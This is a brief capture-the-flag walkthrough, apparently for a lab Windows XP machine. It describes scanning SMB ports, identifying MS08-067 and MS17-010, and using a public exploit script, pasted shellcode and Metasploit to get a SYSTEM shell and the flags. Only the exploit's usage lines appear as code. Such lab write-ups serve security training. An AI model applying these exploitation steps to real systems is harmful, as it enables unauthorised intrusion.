Reconnaissance
Enumeration
Exploitation
Windows Privilege Escalation
Windows Privilege Escalation with Metasploit
________________________________________
Reconnaissance
Run the nmapAutomator.sh script to automate all of the process of recon/enumeration.We can see there are 2 pots open port 139 & 445
Enumeration
from nmapautomator Vuln Scan we get to know there is 2 vulnerability MS08-067 & MS17-010 from both vulnerability we get System PrivilegeMS08-067
lets download the exploit code and generate shellcode
Now paste the shellcode into the python script
before launching the exploit we have to know which OS version it is we get to know in nmapautomator scan result
print 'Example: MS08_067.py 192.168.1.1 1 for Windows XP SP0/SP1 Universal\n'
print 'Example: MS08_067.py 192.168.1.1 2 for Windows 2000 Universal\n'
print 'Example: MS08_067.py 192.168.1.1 3 for Windows 2003 SP0 Universal\n'
print 'Example: MS08_067.py 192.168.1.1 4 for Windows 2003 SP1 English\n'
print 'Example: MS08_067.py 192.168.1.1 5 for Windows XP SP3 French (NX)\n'
print 'Example: MS08_067.py 192.168.1.1 6 for Windows XP SP3 English (NX)\n'
print 'Example: MS08_067.py 192.168.1.1 7 for Windows XP SP3 English (AlwaysOn NX)\n'
Exploitation
now lets run the exploit and start the listenerwe got the shell with System Privilege
Windows Privilege Escalation with Metasploit
we can exploit this vulnerability with metasploit also as shown in the below imageMS17-010
lets download the python script send_and_execute.py and mysmb.py, send_and_execute.py script will upload our exploit and execute it
Now generate payloadlets start the listener and run the exploit
User flag is in “C:\Documents and Settings\john\Desktop” directory and root flag is in “C:\Documents and Settings\Administrator\Desktop” directory.